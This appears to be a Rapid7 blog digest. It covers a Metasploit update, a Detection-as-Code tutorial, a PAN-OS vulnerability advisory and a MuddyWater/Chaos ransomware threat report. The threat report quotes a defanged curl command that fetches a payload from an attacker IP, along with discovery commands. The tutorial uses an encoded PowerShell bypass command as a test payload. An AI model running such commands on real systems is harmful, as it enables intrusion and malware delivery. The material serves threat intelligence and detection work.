Rapid7 Cybersecurity Blog: Today, 12 May 2026

Final Countdown: Last Chance to Join the Rapid7 Global Cybersecurity Summit

11 May 2026 at 08:54

The Rapid7 2026 Global Cybersecurity Summit is just around the corner, and with it, a final opportunity to join the conversations shaping how security teams are adapting to a rapidly changing landscape.

Over the past few weeks, we’ve shared a preview of what to expect, from the sessions and speakers to the themes running across the agenda. What has become increasingly clear is how closely these topics are connected. Security teams are being asked to move beyond reacting to incidents and instead understand how attacks begin, how they evolve, and how decisions can be made earlier with greater confidence.

What you will gain from attending

Across two days, the summit is structured to reflect how security teams actually operate. The first day builds a shared understanding of how the threat landscape has shifted, while the second day offers more focused sessions tailored to both leaders and practitioners.

Sessions such as The Reality of Running a SOC in 2026 and Inside the Modern SOC explore how attacks unfold in practice, following signals from initial access through to response. These discussions highlight how analysts interpret activity across identity, cloud, and endpoint environments, and how decisions are made when multiple signals compete for attention.

Other sessions, including Beyond the Vulnerability List and From Cloud Exposure to Runtime Attack, focus on how exposure is changing the way teams prioritize risk. The emphasis is on understanding context, including how exposed assets truly are to attackers, helping teams determine which issues are most likely to lead to impact and where effort should be focused.

Alongside this, sessions like The AI Dilemma: Automating Defense Without Surrendering Judgment examine how AI is being applied within SOC workflows. The discussion moves beyond theory and looks at how teams are balancing automation with human oversight, ensuring that speed does not come at the expense of trust or accountability.

What’s changing for security teams right now

Security operations are evolving in response to changes in both attacker behavior and organizational complexity. Environments are more distributed, signals are more fragmented, and the time available to respond continues to shrink.

As a result, the focus is shifting toward earlier action, better prioritization, and more connected decision-making. This means linking exposure with detection, reducing unnecessary noise, and building workflows that allow teams to act with clarity when it matters most.

Across the summit, these ideas are explored from multiple perspectives, but they consistently point toward the same outcome. Teams that can connect context, visibility, and response are better positioned to reduce risk before it becomes an incident.

Secure your place

With the event approaching, this is the final opportunity to register and take part in these discussions. Whether you are responsible for strategy, operations, or day-to-day detection and response, the summit is designed to provide practical insights that can be applied immediately.

Join us on May 12–13 and see how security teams are putting these approaches into practice across real environments.

Register now

Rapid7 Cybersecurity Blog: Before yesterday

Metasploit Wrap-Up 05/08/2026

Spring cleanup

This week’s Metasploit updates focused on foundational improvements and expanded target reach. Key enhancements were made to the recently released Copy Fail exploit module, which now benefits from payload fixes in linux/x64/exec and linux/armle/exec. These changes expand its capability, enabling the use of the cmd/unix/python/meterpreter/reverse_tcp payload on x64 targets and introducing support for ARMLE Linux. Additionally, the exploit/multi/http/shiro_rememberme_v124_deserialize module has been improved to allow operators to adjust the deserialization chain, enabling exploitation of a broader set of targets. Finally, several critical utility modules, including the FTP anonymous scanner and other FTP modules, received general fixes and updates.

New module content (1)

Anonymous FTP Access Detection

Authors: Matteo Cantoni <goony@nothink.org> and g0tmi1k

Type: Auxiliary

Pull request: #21372 contributed by g0tmi1k

Path: scanner/ftp/ftp_anonymous

AttackerKB reference: CVE-1999-0497

Description: This updates the FTP anonymous scanner module. Key changes include moving the module to align with other generic FTP modules, adding and updating CVE references and documentation notes, and cleaning up the output to be more verbose. Additionally, the module now reports service and vulnerability data to the database and stores proof-of-exploitation info in the loot upon a successful run.
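The core check the module performs, logging in with the well-known anonymous credentials, can be sketched with a plain FTP client. The snippet below is an illustrative Python sketch, not the module's actual Ruby implementation:

```python
import ftplib

def allows_anonymous(host: str, port: int = 21, timeout: float = 5.0) -> bool:
    """Return True if the FTP service accepts the classic anonymous login."""
    try:
        with ftplib.FTP() as ftp:
            ftp.connect(host, port, timeout=timeout)
            # RFC 1635 convention: user "anonymous", an email address as password
            ftp.login("anonymous", "mozilla@example.com")
            return True
    except ftplib.all_errors:
        return False
```

A real scanner would additionally record the FTP banner and, on success, store proof such as a directory listing, which is essentially what the updated module now reports to the database and loot.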

Enhanced Modules (2)

Modules which have either been enhanced or renamed:

  • #21410 from inkognitobo - This improves the exploit/multi/http/shiro_rememberme_v124_deserialize module by adding a JAVA_GADGET_CHAIN datastore option that allows the operator to adjust the chain used for deserialization. This enables the module to exploit additional targets.
  • #21404 from zeroSteiner - This extends the support of Copy Fail to ARMLE Linux targets.

Enhancements and features (4)

  • #21342 from adfoster-r7 - Defers the loading of some dependencies to improve console boot time.
  • #21372 from g0tmi1k - This updates the FTP anonymous scanner module. Key changes include moving the module to align with other generic FTP modules, adding and updating CVE references and documentation notes, and cleaning up the output to be more verbose. Additionally, the module now reports service and vulnerability data to the database and stores proof-of-exploitation info in the loot upon a successful run.
  • #21380 from g0tmi1k - Updates multiple FTP modules to now register FTP service information in the database when successfully connecting to an FTP service.
  • #21418 from kx7m2qd - This improves the platform-agnostic library used to obtain the OS architecture with support for shell sessions on Linux, BSD and Mac OSX.

Bugs fixed (5)

  • #21314 from g0tmi1k - Fixes a crash when running the scanner/http/trace module with the database enabled and a vulnerability is reported.
  • #21411 from zeroSteiner - This fixes a bug in the linux/x64/exec payload that was caused by the CMD datastore option being placed in the assembly source without being escaped.
  • #21413 from tart0ru5 - Fixes a logic error in the exploits/linux/http/projectsend_unauth_rce module that incorrectly checked if a new user has been created.
  • #21421 from adfoster-r7 - This adds extra validation to report_vuln and delete_vuln in Msf::DBManager::Vuln to make sure required fields are present and avoid a crash.
  • #21425 from g0tmi1k - Fixes a bug when parsing FTP server responses.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition, Metasploit Pro.

Zero Chaos: Scaling Detection Engineering at the Speed of Software, with Detection As Code

8 May 2026 at 08:37

Every engineering team in your organization ships code through a pipeline. They branch, test, review, and deploy. If something breaks, they roll back. If someone asks "what changed?", the answer is in the commit history. This isn't heroic discipline; it's just how software gets built.

Now think about how your detection engineering team works.

Rules get written in a UI. Maybe copied and pasted from a wiki. There's no peer review; someone clicks "save," and it's live. No test cases validate the logic before deployment. No rollback if something breaks. When an alert suddenly floods your SOC, good luck figuring out what changed and when. When a detection stops firing, you might not notice for weeks.

This is, by definition, a process gap. And it's one that the rest of engineering solved years ago. The table below shows how each stage of the process compares. As your detection estate grows, you need the same discipline that every other engineering team already has.

Process Stage   How it works in software engineering   How it works in detection engineering
Storage         Git / Version Control                  UI / Wiki / "Tribal Knowledge"
Validation      Automated CI/CD Tests                  "Wait and see if it fires"
Review          Peer-reviewed Pull Requests            Single-user "Save" button
Rollback        One-click git revert                   Manual query deletion

How does this help my security team?

Detection as Code gives your team a structured, repeatable way to build and manage detections with confidence. Instead of relying on manual updates and guesswork, every change is tested, reviewed, and tracked before it reaches production. Before we get into the how, here's why Detection as Code changes the way your team works:

  • A more reliable process. Every change goes through version control and peer review before it goes live. When something goes wrong, you know exactly what changed, when it changed, and who approved it. Roll back in seconds if needed.

  • A safety net of tests. Inline test cases validate detection logic before deployment. Positive tests prove it catches the threat; negative tests prove it doesn't fire on legitimate activity.

  • Confidence in what's deployed. terraform plan previews every change before anything touches production. Terraform state is the authoritative record of your detection estate, not some spreadsheet.

The result is a detection workflow your team can trust. Changes are predictable, validated, and fully traceable, so security teams don’t get caught up in troubleshooting and can focus on improving coverage and overall posture. 

The anatomy of a detection

Here is what a detection rule looks like using Rapid7’s Terraform provider. It offers a practical view of how detection engineering teams can use Detection as Code in practice:

resource "rapid7_siem_detection_rule" "encoded_powershell" {
  name        = "Encoded PowerShell Command Execution"
  description = "Detects PowerShell launched with base64-encoded commands"
  techniques  = ["T1059.001"]
  action      = "CREATES_ALERTS"
  priority    = "HIGH"

  logic = {
    leql = <<-LEQL
      from(event_type = process_start_event)
      where(
        (process.exe_path = /.*\\powershell\.exe$/i
         OR process.exe_path = /.*\\pwsh\.exe$/i)
        AND process.cmd_line ICONTAINS " -e"
        AND process.cmd_line ICONTAINS-ANY [
          " JAB", " SUVYI", " SQBFAFgA", " aWV4I"
        ]
      )
    LEQL

    testcases = [
      {
        matches = true
        payload = jsonencode({
          process = {
            exe_path = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
            cmd_line = "powershell.exe -ep bypass -e JABjAGwAaQBlAG4AdAA="
          }
        })
      },
      {
        matches = false
        payload = jsonencode({
          process = {
            exe_path = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
            cmd_line = "powershell.exe -File C:\\Scripts\\backup.ps1"
          }
        })
      }
    ]
  }
}
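The " JAB"-style markers in the query are not arbitrary. PowerShell's -EncodedCommand takes base64 over UTF-16LE text, so any command beginning with "$" encodes to a string starting with "JAB". A quick Python sketch of that encoding (the "$client" value is just an example command prefix):

```python
import base64

def encode_ps(command: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects:
    UTF-16LE bytes, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

print(encode_ps("$client"))  # JABjAGwAaQBlAG4AdAA=
```

The output matches the positive testcase payload above, and the same reasoning explains the other markers, which correspond to common encoded-command prefixes such as "IEX".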

Why this works:

  1. Version-controlled logic: The LEQL query defines the threat logic in a text format that Git can track.

  2. MITRE ATT&CK® integration: The techniques field ensures your coverage map updates automatically.

  3. Inline testing: We aren't just deploying a query, but a validated unit of logic. The pipeline won't let this reach production if the logic fails to fire on the matching payload or accidentally fires on the non-matching payload.
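That deployment gate can be mimicked outside Terraform. Below is a hypothetical Python sketch of the inline-testcase idea: the predicate mirrors the LEQL logic, and a change is only "deployable" if every positive case matches and every negative case does not. Names and structure are illustrative, not Rapid7's pipeline:

```python
import re

# Hypothetical stand-in for the provider's inline testcases.
# The predicate mirrors the LEQL rule: PowerShell binary + "-e" flag + marker.
def detects_encoded_powershell(event: dict) -> bool:
    proc = event["process"]
    return (
        re.search(r"\\(powershell|pwsh)\.exe$", proc["exe_path"], re.I) is not None
        and " -e" in proc["cmd_line"].lower()
        and any(m in proc["cmd_line"] for m in (" JAB", " SUVYI", " SQBFAFgA", " aWV4I"))
    )

testcases = [
    # matches = true: encoded command should fire
    (True, {"process": {
        "exe_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmd_line": "powershell.exe -ep bypass -e JABjAGwAaQBlAG4AdAA="}}),
    # matches = false: plain script execution should not fire
    (False, {"process": {
        "exe_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmd_line": "powershell.exe -File C:\\Scripts\\backup.ps1"}}),
]

def gate(cases) -> bool:
    """Deployment gate: every expectation must hold, or the change is rejected."""
    return all(detects_encoded_powershell(ev) == expected for expected, ev in cases)
```

Running gate(testcases) before merge is the whole trick: a broken detection fails in CI, not in your SOC's alert queue.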

Why Terraform?

Because it's the industry standard for managing infrastructure as code. We didn't invent a proprietary CLI; we built on the tool that thousands of platform teams already run daily. If your organization uses Terraform for cloud infrastructure, your detection engineers now use the same tool, the same workflow, and the same review process.

Governance happens naturally in this model. Open a pull request. Your team sees the logic, the test cases, and the expected behavior. They comment, suggest improvements, and approve. Every change is traceable in your commit history. This isn't a separate compliance exercise bolted onto your workflow. It is the workflow.

Already have rules built in the UI? One command imports them all:

terraform query -generate-config-out=imports.tf

AI-assisted detection writing

The quick-start repo ships with IDE configurations for Claude Code, Cursor, VS Code Copilot, and Kiro. These configs give your AI assistant full context on the Terraform provider schema, LEQL syntax, and MITRE ATT&CK mappings.

In practice: open your editor, describe a threat in plain English, such as ‘write me a detection for lateral movement via RDP from non-admin workstations,’ and get back a complete Terraform resource ready for review. The AI accelerates the engineer; it doesn't replace them. The time from "I need a detection" to "this is ready for review" drops from hours to minutes.

Start building detections as code today

Rapid7’s Terraform provider for Detection as Code is now available across all Incident Command and InsightIDR tiers.

To get to work, use the Getting Started guide for a walkthrough as you set up, authenticate, and run your first deployment. Clone the quick-start template, run terraform plan, and see your detection estate as code.
For more information on Incident Command, visit our SIEM hub page.

Rapid7 and OpenAI: Helping Defenders Move at Machine Speed

7 May 2026 at 16:00

Wade Woolwine is Senior Director, Product Security at Rapid7.

Announcing OpenAI's Trusted Access for Cyber program

CIOs and CISOs are telling us the same thing in different ways: Advances in frontier AI are accelerating the threat environment and putting pressure on security operating models built for a different pace. Vulnerabilities can be discovered faster, exploitation windows are shrinking, and attackers are increasingly using automation to move with greater speed and scale. For defenders, this changes the value equation. The premium is no longer only on detecting threats faster after they emerge, but on moving earlier: Reducing exposure, validating risk, strengthening detection, and remediating at scale before attackers can take advantage.

This is why Rapid7 is excited to be included in OpenAI’s Trusted Access for Cyber program and their announcement today. OpenAI’s approach recognizes that advanced AI can help verified security teams move faster on legitimate defensive work, from triage and detection to validation, patching, malware analysis, and detection engineering. It also recognizes that some specialized cyber workflows require stronger verification, monitoring, and feedback loops.

As Corey Thomas, CEO of Rapid7, shared:

“Security leaders are under pressure from every direction: More vulnerabilities, faster exploitation, and increasing business pressure. Through OpenAI’s Trusted Access for Cyber program, Rapid7 is exploring more ways to accelerate the shift from reactive to preemptive security. To stay ahead of attackers, defenders must proactively reduce exploitability and detect with machine-scale speed and precision. We’re working with OpenAI to equip security teams with advanced capabilities that will meaningfully improve their cyber resilience.”

AI in security: Not just faster discovery

For Rapid7, this moment is about more than faster vulnerability discovery. AI is creating new pressure across the entire security lifecycle, from vulnerability validation, prioritization, disclosure, and remediation to threat and exploitation detection. Security infrastructure built for human-speed discovery now needs to operate in a machine-speed world, with enough context, governance, and accountability to help defenders act with confidence.

Finding risk is only the beginning. Security teams need to understand which vulnerabilities and misconfigurations are truly exploitable, which systems and business services are affected, what compensating controls are in place, how remediation should be prioritized, and where detection coverage is needed. CISOs also need confidence that advanced AI is being applied responsibly, with clear guardrails, measurable outcomes, and accountability.

Our work with OpenAI will help us explore how frontier AI can strengthen three critical areas. First, it can support the identification of vulnerabilities in our own products and code earlier in the development lifecycle. By accelerating secure code review, surfacing risky patterns, supporting root cause analysis, reviewing patches, and giving engineering teams faster feedback, AI can help reduce risk before issues reach production.

Second, it can advance vulnerability research and exploitation analysis. Rapid7 has long-standing expertise in vulnerability intelligence, exploitability research, and offensive security with Rapid7 Labs. Frontier AI can help researchers reason across unfamiliar code, map affected surfaces, build safe reproduction harnesses, validate severity, and turn findings into practical remediation guidance.

Third, it can expand AI-driven red-teaming. As AI becomes more embedded in enterprise systems and security operations, it must also be tested adversarially. We see an opportunity to use AI to strengthen red-team workflows, explore attack paths, validate controls, and help defenders understand where exposure could become real-world risk.

Artificial intelligence in use at Rapid7

We are already seeing this potential inside our own security operations work. In support of our Agentic SOC initiatives, Rapid7 has designed and implemented a system that uses machine learning to surface threat- and risk-relevant events from raw log and telemetry data. By using frontier AI models, including OpenAI’s GPT-5.5, to support initial triage and escalate only relevant events to SOC analysts, we have seen a 25% reduction in time spent chasing false-positive events in the queue.

This is not about replacing human expertise. It is about giving defenders better leverage in a world where attackers, businesses, and technology are all moving faster. The shift from reactive to preemptive security, and from human-scale processes to machine-scale defense, is not a marketing reframe. It is becoming the only viable path for teams that need to anticipate where attackers will move next, prioritize the exposures that actually matter, and respond at the speed of modern attacks.

AI may accelerate discovery, but cyber resilience depends on what happens after discovery. Customers need to unify their data, apply AI with the right context, drive remediation at scale, and translate security activity into measurable outcomes. That is where Rapid7 is focused. Across the Command Platform, Rapid7’s AI capabilities are built to help security teams detect threats and anomalies at scale, reduce noise, optimize SOC workflows, and make faster, more confident decisions.

By unifying Exposure Management and Detection and Response on the Command Platform, and combining AI-driven operations with the depth of expertise we have built over 25 years, Rapid7 is giving customers a more coherent way to reduce risk, disrupt attackers, and build durable cyber resilience. Learn more about Rapid7’s AI capabilities.

Why Security in 2026 Requires Continuous Threat and Exposure Management (CTEM) at Scale

7 May 2026 at 09:00

Let's be honest: the patching window just shrank to something no practitioner or organization can keep up with. Organizations now need to operate in an environment that must assume breach, which means fundamentals like attack surface management, micro-segmentation, identity management, and attack path validation – a few core pillars of CTEM – just became the most important initiatives within the cybersecurity department. Rapid7 is the only vendor that provides a truly unified platform to master Continuous Threat Exposure Management (CTEM).

How Rapid7 satisfies all 5 steps of the CTEM Framework

Steps 1 and 2: Scoping and Discovery

Achieving full visibility

Rapid7 eliminates "unknown unknowns" by providing line-of-sight into 100% of your hybrid attack surface.

  • Surface Command (CAASM): We establish a single source of truth by unifying asset and identity inventory from over 200 third-party vendors and native sources.

  • Vulnerability Management: Our full-stack active scanning discovers shadow IT hidden within your enterprise network.

  • External Attack Surface Management (EASM): We scan the entire IPv4 space of the internet to automatically track changes to registered domains and public networks so you can map your external kingdom.

  • Unified CNAPP (Cloud Security): Our platform provides real-time, agentless visibility into every resource running across your multi-cloud environment (AWS, Azure, GCP, and Kubernetes). Through Event-Driven Harvesting (EDH), we identify infrastructure changes in under 60 seconds. This allows us to map not just the assets, but the complex identities and permissions that define your cloud risk.

Step 3: Prioritization

Moving beyond static scores

We replace generic risk scores with Active Risk and Threat-Aware Context. Our platform automatically prioritizes vulnerabilities based on real-world exploitability data from Rapid7 Labs and the Exploit Prediction Scoring System (EPSS). We are also able to incorporate your own organization’s tagging infrastructure to properly contextualize your enterprise so you focus on what matters most. 
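To make the idea concrete, here is a hypothetical illustration of threat-aware prioritization in Python. This is not Rapid7's actual Active Risk formula; it only shows how an exploitability signal (such as EPSS) and organizational tags can re-rank findings that share the same CVSS score:

```python
def priority(cvss: float, epss: float, tags: set) -> float:
    """Toy score: severity scaled by exploit likelihood and asset context."""
    weight = 1.0
    if "crown-jewel" in tags:      # business-critical asset, per org tagging
        weight *= 1.5
    if "internet-facing" in tags:  # reachable by attackers
        weight *= 1.25
    return cvss * (0.5 + epss) * weight

# Two CVSS 9.8 findings: the likely-exploited, internet-facing one ranks far higher.
hot = priority(9.8, epss=0.92, tags={"internet-facing"})
cold = priority(9.8, epss=0.02, tags=set())
```

The exact weights are invented for illustration; the point is that two "critical" findings can land in very different places once exploitability and context are factored in.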

Step 4: Validation

Continuous human-led red teaming 

This is where Rapid7 truly stands apart from automated-only vendors or point-in-time pen tests. Vector Command provides the expert human logic needed to bypass compensating controls like WAFs that stop automated tools cold. This gives Rapid7 the ability to answer the question: “How would an attacker get in?” We fully map the attack chain from the external to the internal so you have insight into where your controls are weakest.
Ed Montgomery at Rapid7 has written extensively about the power of Vector Command – you can find his blogs here.
Here’s a sampling of a couple of those stories: 

  • The Telerik UI Example: While a scanner flags an old version of Telerik, our operators discovered they could bypass a WAF by splitting a malicious payload into 118 individual, "harmless" fragments, achieving full remote code execution that a time-boxed, two-week pentest would never have uncovered. An automated scan might have flagged the outdated Telerik component as notable, but it was really the WAF configuration that allowed the bypass, something an automated scan would never have found.

  • SaaS Phishing: Our team used a misconfigured public Jira instance that allowed self-registration to hijack an Office 365 session and move laterally through internal trust. This validated that the true risk was a SaaS misconfiguration, not a patchable CVE.

Step 5: Mobilization

Instant response and remediation 

We don't just find problems; we close the loop with integrated action.

  • Cloud Runtime Security (CADR): Powered by our partnership with ARMO, our eBPF-based sensor can shut down an attack in seconds by killing malicious processes or pausing containers at the moment of detection.

  • Automation (SOAR): InsightConnect and our "Bot Factory" in CNAPP trigger automated remediation workflows to lock down S3 buckets or disable compromised users instantly.

  • Remediation Hub: We provide a centralized, vendor agnostic action-driven list of prioritized fixes to coordinate seamlessly with IT teams.

[Figure: Rapid7 CTEM framework]

The new standard: From weeks to minutes

If your CTEM strategy relies on static tools and annual checkboxes, you are not just behind the curve. You are operating in a completely different era. By unifying the full visibility of Surface Command with the critical thinking of Vector Command and the instant response of our Cloud Runtime capabilities, Rapid7 empowers you to take command of your attack surface.

Do not wait for a 118-fragment request bypass to prove your defenses are porous. Move from a posture of passive observation to one of preemptive security.

Critical Buffer Overflow in Palo Alto Networks PAN-OS User-ID Authentication Portal (CVE-2026-0300)

6 May 2026 at 09:27

Overview

On May 6, 2026, Palo Alto Networks published a security advisory for CVE-2026-0300, a critical unauthenticated buffer overflow vulnerability affecting PAN-OS PA-Series and VM-Series firewall appliances. Prisma Access, Cloud NGFW, and Panorama appliances are not affected by this vulnerability. The vulnerability carries a CVSSv4 score of 9.3 and has been confirmed as exploited in the wild by the vendor.

CVE-2026-0300 is a buffer overflow (CWE-787) in the User-ID™ Authentication Portal (also known as Captive Portal), a non-default PAN-OS feature used to map IP addresses to usernames. An unauthenticated remote attacker can exploit this vulnerability by sending specially crafted packets to a device with the Authentication Portal enabled, achieving arbitrary code execution with root privileges on the affected firewall. No authentication or user interaction is required.

Palo Alto Networks has confirmed limited exploitation in the wild targeting Authentication Portals exposed to either untrusted IP addresses or the public internet. No patches are currently available; fixed versions are expected to begin rolling out on May 13, 2026, with additional releases through May 28, 2026.

PAN-OS is among the most widely deployed enterprise firewall operating systems in the world. Shodan identifies approximately 225,000 internet-facing PAN-OS instances, representing a significant attack surface. Rapid7 strongly urges all organizations running affected PAN-OS versions with the User-ID Authentication Portal enabled to apply the available workarounds immediately and prioritize patching as soon as fixed versions become available.

Update #1: On May 6, 2026, CVE-2026-0300 was added to the U.S. Cybersecurity and Infrastructure Security Agency's (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation. Palo Alto Networks Unit 42 also published a threat brief attributing observed exploitation to CL-STA-1132, a likely state-sponsored threat cluster that deployed open-source tunneling tools and conducted Active Directory enumeration following initial compromise.

Mitigation guidance

Organizations running PA-Series and VM-Series firewalls with the User-ID™ Authentication Portal enabled should apply the available workarounds immediately and prioritize patching as soon as fixed versions are released. Check the official documentation to establish whether the affected User-ID™ Authentication Portal is currently enabled.

According to the Palo Alto Networks advisory, the following versions are affected by CVE-2026-0300:

Product       Affected          Unaffected         Fix ETA
PAN-OS 12.1   < 12.1.4-h5       >= 12.1.4-h5       05/13
              < 12.1.7          >= 12.1.7          05/28
PAN-OS 11.2   < 11.2.4-h17      >= 11.2.4-h17      05/28
              < 11.2.7-h13      >= 11.2.7-h13      05/13
              < 11.2.10-h6      >= 11.2.10-h6      05/13
              < 11.2.12         >= 11.2.12         05/28
PAN-OS 11.1   < 11.1.4-h33      >= 11.1.4-h33      05/13
              < 11.1.6-h32      >= 11.1.6-h32      05/13
              < 11.1.7-h6       >= 11.1.7-h6       05/28
              < 11.1.10-h25     >= 11.1.10-h25     05/13
              < 11.1.13-h5      >= 11.1.13-h5      05/13
              < 11.1.15         >= 11.1.15         05/28
PAN-OS 10.2   < 10.2.7-h34      >= 10.2.7-h34      05/28
              < 10.2.10-h36     >= 10.2.10-h36     05/13
              < 10.2.13-h21     >= 10.2.13-h21     05/28
              < 10.2.16-h7      >= 10.2.16-h7      05/28
              < 10.2.18-h6      >= 10.2.18-h6      05/13
Until patches are available, Palo Alto Networks recommends one of the following workarounds:

  • Restrict User-ID™ Authentication Portal access to only trusted internal zones. Refer to Step 6 of the Live Community article and the Knowledgebase article for instructions on restricting access.

  • Disable User-ID™ Authentication Portal entirely if it is not required (Device > User Identification > Authentication Portal Settings > uncheck Enable Authentication Portal).

Please refer to the vendor advisory for the latest guidance.

Rapid7 customers

Exposure Command, InsightVM, and Nexpose

Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-0300 with authenticated vulnerability checks available in the May 6th, 2026 content release.

Updates

  • May 6, 2026: Initial publication.

  • May 7, 2026: Updated overview to note the addition to CISA KEV and the Unit 42 threat brief attributing exploitation to CL-STA-1132.

Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware

Executive summary

In early 2026, a sophisticated intrusion initially appearing to be a standard Chaos ransomware attack was assessed to be consistent with a targeted state-sponsored operation. While the threat actor operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, forensic analysis revealed the incident was a "false flag" masquerade. Technical artifacts, including a specific code-signing certificate and Command-and-Control (C2) infrastructure, suggest with moderate confidence that this activity is linked to MuddyWater (Seedworm), an Iranian Advanced Persistent Threat (APT) affiliated with the Ministry of Intelligence and Security (MOIS).

The campaign was characterized by a high-touch social engineering phase conducted via Microsoft Teams, where the attackers utilized interactive screen-sharing to harvest credentials and manipulate Multi-Factor Authentication (MFA). Once inside, the group bypassed traditional ransomware workflows, forgoing file encryption in favor of data exfiltration and long-term persistence via remote management tools like DWAgent. This report deconstructs the infection chain and analyzes the custom "Game.exe" Remote Access Trojan (RAT).

Additionally, this report explores how MuddyWater is increasingly leveraging the cybercriminal ecosystem to provide plausible deniability for geopolitical espionage and prepositioning, particularly in the US. The strategy highlights the convergence between state-sponsored intrusion activity and criminal tradecraft, where a big “tell” lies in the techniques that were deployed – and those that weren’t.

This overall strategy suggests the primary goal was not financial gain. It is further evidence that the lines between state and criminal operations are blurring against the backdrop of geopolitical tensions, and that attribution will only get harder for teams that do not conduct proper, thorough research.

Rapid7 coverage

Rapid7 has coverage for this campaign across both intelligence and detection workflows. The campaign is available in Rapid7’s Intelligence Hub, providing customers with curated context, indicators, and threat actor tradecraft to support awareness, investigation, and prioritization. Relevant detections are also available in InsightIDR, helping security teams identify activity associated with this intrusion pattern across their environments.

Chaos ransomware: Profile and targeting

Active since February 2025, Chaos is a ransomware-as-a-service (RaaS) operation specializing in big-game hunting (BGH) attacks against high-profile organizations, with reported ransom demands reaching up to $300,000. Despite the name, it is distinct from the Chaos malware builder identified in 2021. The group emerged shortly after the July 2025 law enforcement disruption of BlackSuit infrastructure during Operation Checkmate and is likely composed of former BlackSuit and/or Royal members. To expand its operations, Chaos advertises its affiliate program on cybercrime forums, such as RAMP (prior to its takedown) and RehubCom.

Chaos relies heavily on social engineering and remote access abuse to gain initial access. Rapid7 observed techniques that include spam email flooding combined with voice-based phishing (vishing), often involving impersonation of IT support personnel. Chaos then persuades victims to grant remote access via legitimate tools such as Microsoft Quick Assist, allowing operators to establish an initial foothold.

In line with common ransomware practices, Chaos typically employs double extortion, exfiltrating sensitive data prior to encryption and threatening public disclosure via its data leak site (DLS). The group has also demonstrated triple extortion by threatening distributed denial-of-service (DDoS) attacks against the victim's infrastructure. These capabilities are reportedly offered to affiliates as part of bundled services, representing a notable feature of its RaaS model. Additionally, Chaos has been observed leveraging elements of quadruple extortion, including threats to contact customers or competitors to increase pressure on victims.

A distinguishing characteristic of the group’s DLS is the use of a “blind” countdown timer, which withholds the victim’s identity until expiration, likely intended to accelerate negotiations (Figure 1). As of late March 2026, Chaos has claimed 36 victims and maintained a consistent operational tempo (Figure 2). The group predominantly targets organizations in the United States, with a particular focus on the construction, manufacturing, and business services sectors (Figure 3).

Chaos-DLS-screenshot.png
Figure 1: Screenshot from Chaos’ DLS

chart-claimed-victims.png
Figure 2: Number of claimed victims over time

geographic-victim-distribution.png
Figure 3: Geographic victim distribution

Incident overview

The intrusion that Rapid7 investigated began with a targeted social engineering campaign leveraging Microsoft Teams, where the threat actor (TA) engaged employees through external chat requests. By operating interactively through compromised users, the attacker conducted initial discovery, harvested credentials, manipulated MFA configurations, and quickly transitioned to using legitimate accounts for internal access.

From there, the TA established persistence using remote access tools such as DWAgent and AnyDesk, before deploying additional payloads and extending control of the environment. Following this, the TA exfiltrated data from the compromised environment and subsequently contacted the victim via email, claiming data theft and initiating ransom negotiations (Figure 4).

 

FixedDiagram.jpg
Figure 4: Incident breakdown

Initial access via social engineering and remote interaction

The TA achieved initial access through social engineering conducted via Microsoft Teams, where they initiated one-on-one chats with users from a controlled account. During these interactions, the TA established screen-sharing sessions, gaining direct visibility and interactive access to user assets.

While connected, the TA executed basic discovery commands, accessed files related to the victim’s VPN configuration, and instructed users to enter their credentials into locally created text files. In at least one instance, the TA deployed a remote management tool (AnyDesk) to further facilitate access.

ipconfig /all
nslookup
net start
whoami
ping

Figure 5: Discovery commands executed by the TA

Credential harvesting and account compromise

A key component of the intrusion involved interactive credential harvesting: The TA explicitly instructed victims to enter credentials into locally created text files (credentials.txt, cred.txt) and to modify MFA configurations to include attacker-controlled devices.

Additionally, Rapid7’s analysis of browser artifacts revealed access to the URL hxxps[://]adm-pulse[.]com/verify.php.

The URL led to a Quick Assist-themed phishing page, indicating credential harvesting through impersonation.

Establishing initial foothold and remote access

Following credential compromise, the TA authenticated to internal systems, including a Domain Controller, using multiple compromised accounts. They then established persistent remote access through RDP sessions and deployment of the remote management tool DWAgent. The DWAgent installation chain included:

| File name | Description |
| --- | --- |
| dwagent.exe | Remote access tool |
| pythonw.exe | Windowless version of the Python interpreter |
| dwagsvc.exe | DWAgent service |
| dwaglnc.exe | Background component of DWAgent |

Table 1: Files observed during installation of DWAgent

Payload delivery and execution

The TA later executed commands via RDP to download additional payloads using curl:

curl hxxp[://]172.86.126[.]208:443/ms_upd.exe -o C:\ProgramData\ms_upd.exe

After the download, the TA executed the binary ms_upd.exe, initiating a multi-stage infection chain. 

Upon successful execution, ms_upd.exe downloaded additional components:

| File name | SHA256 | Description |
| --- | --- | --- |
| WebView2Loader.dll | a47cd0dc12f0152d8f05b79e5c86bac9231f621db7b0e90a32f87b98b4e82f3a | Legitimate DLL |
| Game.exe | 1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 | Backdoor granting the TA access to the infected machine |
| visualwincomp.txt | c86ab27100f2a2939ac0d4a8af511f0a1a8116ba856100aae03bc2ad6cb0f1e0 | Encrypted configuration |

Table 2: Components downloaded by ms_upd.exe

Lateral movement 

The TA expanded access within the environment by leveraging compromised accounts and establishing remote access channels. They used RDP sessions to move between systems, allowing them to operate interactively and access additional resources within the network.

Extortion activity and data leak claims

The TA distributed emails to multiple users, alleging successful data exfiltration, and provided a .onion link for negotiation. Open-source intelligence (OSINT) collection identified a corresponding entry on the Chaos DLS referencing data; however, all identifying details were redacted, as per the group’s typical “blind” countdown timer. 

